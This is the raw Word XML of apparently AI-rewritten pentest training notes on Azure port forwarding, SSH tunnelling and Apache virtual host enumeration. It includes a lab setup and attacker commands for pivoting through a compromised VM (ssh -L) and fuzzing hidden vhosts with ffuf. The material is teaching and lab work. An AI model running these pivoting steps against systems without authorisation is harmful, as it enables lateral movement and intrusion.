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DC9C" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED611AE" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35712537" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc226381648"/>
      <w:r>
        <w:t>Port Forwarding and Tunnelling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="50AD8320" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B8C3BCB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Here is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>corrected, rewritten, and Azure-specific</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> version of the content you provided, focused on </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>port forwarding, tunneling, and virtual hosting</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the context of </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure penetration testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>. The explanation is more structured and includes detailed steps suitable for red teaming and security testing in cloud environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDE9411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0878F440">
          <v:rect id="_x0000_i1160" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE3284B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☁️</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure Penetration Testing: Port Forwarding, Tunneling &amp; Virtual Host Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8D901A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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DDFA87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Understand and exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>port forwarding</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>SSH tunneling</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Apache virtual host misconfigurations</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> within Azure environments. These tactics are especially useful during </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>post-exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>lateral movement</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>web application discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> phases when targeting misconfigured virtual machines or internal services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE0F903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233EE24A">
          <v:rect id="_x0000_i1161" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BDDE7A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📖</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Key Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0CC7DC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🔁</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Port Forwarding (NAT-based Access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375C1F16" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: Port forwarding in Azure refers to exposing internal services (e.g., on a VM) by forwarding traffic from a </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>public IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and port to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>private IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and internal port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64215280" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Scenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: An attacker gains access to a low-privilege VM and sets up </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>SSH-based port forwarding</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to reach internal-only services like PostgreSQL, Redis, or web admin panels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D66EB96" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Limitation</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Azure NSGs (Network Security Groups) and firewalls usually prevent unauthorized access to internal ports—</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>unless</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> explicitly misconfigured or abused via SSH tunnels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2068D9B2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3E7BFCB6">
          <v:rect id="_x0000_i1162" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71745368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🔒</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tunneling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B0C381" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Tunneling securely transports network traffic from one point to another (often through SSH or VPN), enabling access to otherwise unreachable internal services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1648F61F" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Real-world Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Create a reverse or forward tunnel to pivot to another VM or subnet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0816B6F7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Example SSH Forward Tunnel:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A75E1F1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ssh -L 8080:10.0.0.5:80 azureuser@10.0.0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4769CDF1" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>8080: Local port on attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410E65E6" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>10.0.0.5:80: Internal service behind 10.0.0.4 (pivot point).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6068101B" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>azureuser@10.0.0.4: Initial foothold VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133EB6B3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359AA510">
          <v:rect id="_x0000_i1163" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F3B12A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🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Virtual Host Enumeration on Azure Web Servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE084AF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🧱</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> What is Apache Virtual Hosting?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624EDAAE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In a cloud or on-prem context, </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>virtual hosting</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows hosting multiple websites on a single server/IP. This is commonly used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>multi-tenant</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure VMs and can be exploited during penetration tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06282C64" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Vulnerability arises when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3BB060" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Hidden domains are misconfigured or poorly secured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EA279E" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Sensitive dev/admin portals are only accessible via obscure ServerNames.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFEC2F2" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Virtual hosts are not properly segmented or protected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0789A2FF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08BB3394">
          <v:rect id="_x0000_i1164" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="463EC563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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lab Simulation: Setting Up Apache Virtual Hosts in Azure VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71273C01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🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prerequisites (Local or Azure VM)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254"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="754E2263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5F8CA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960BC3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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="14F714D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1531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Ubuntu VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="395BE1ED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Target machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="34B6E1DD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6555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Kali VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F84622B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Attacking machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="4AF6DD2C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B7BF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Apache2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14ACF9C6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Web server to simulate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B8FBC52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10B6634D">
          <v:rect id="_x0000_i1165" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54387FBD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⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 1: Install Apache2 on Target Ubuntu VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16894982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sudo apt update &amp;&amp; sudo apt install apache2 -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD5BD85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lastRenderedPageBreak/>
        <w:pict w14:anchorId="400C2CBB">
          <v:rect id="_x0000_i1166" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D4611F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📁</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 2: Create Website Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9EB8E2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sudo mkdir -p /sbin/test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632768AD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echo "&lt;h1&gt;Hidden Virtual Host&lt;/h1&gt;" | sudo tee /sbin/test/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E7A5FC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2E1CDEC5">
          <v:rect id="_x0000_i1167" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D7BF64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🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 3: Modify Apache ports.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD62922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sudo nano /etc/apache2/ports.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF4D3F7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Add:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A74AA08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Listen 127.0.0.1:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ABE61F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This ensures the virtual host only listens on localhost (simulating hidden/internal site).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A81EC9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249B076E">
          <v:rect id="_x0000_i1168" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB1D199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🧾</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 4: Create the Virtual Host Config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C2A67B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sudo nano /etc/apache2/sites-available/test.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B79BCF5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Paste:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38530202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&lt;VirtualHost 127.0.0.1:8080&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6380DC11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DocumentRoot /sbin/test/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6187741B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ServerName hidden.internal.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E1A49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AllowEncodedSlashes NoDecode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C31A45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&lt;Directory "/sbin/test/"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD381F1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  Require all granted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2CA8DC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  AllowOverride All</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7856BD23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  Options FollowSymLinks MultiViews</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A2D0EA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  &lt;/Directory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B357BBF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&lt;/VirtualHost&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD926F4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6A78D4F6">
          <v:rect id="_x0000_i1169" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB82CF1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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 5: Enable and Restart Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA0EC46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sudo a2ensite test.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A950149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sudo systemctl restart apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215F2EC7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388EBE94">
          <v:rect id="_x0000_i1170" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B92594A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🕵️</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>‍</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>♂️</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacking Scenario: Discovering and Accessing Hidden Virtual Hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18785349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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>1. Port Forward to Access Internal Site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1FE478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Assuming attacker has SSH access to a VM in the subnet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718CBE56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ssh -L 8080:127.0.0.1:8080 azureuser@&lt;vm-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6ED4EA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Then, in the browser or curl:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EAEF99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curl -H "Host: hidden.internal.local" http://127.0.0.1:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F68B35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57320C1B">
          <v:rect id="_x0000_i1171" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61476D28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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>2. Virtual Host Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C338FDF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Use ffuf or Gobuster with a wordlist to find hidden virtual hosts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3123068D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ffuf -u http://127.0.0.1:8080 -H "Host: FUZZ" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BF0CF7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36074791">
          <v:rect id="_x0000_i1172" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67612CFB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🧯</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
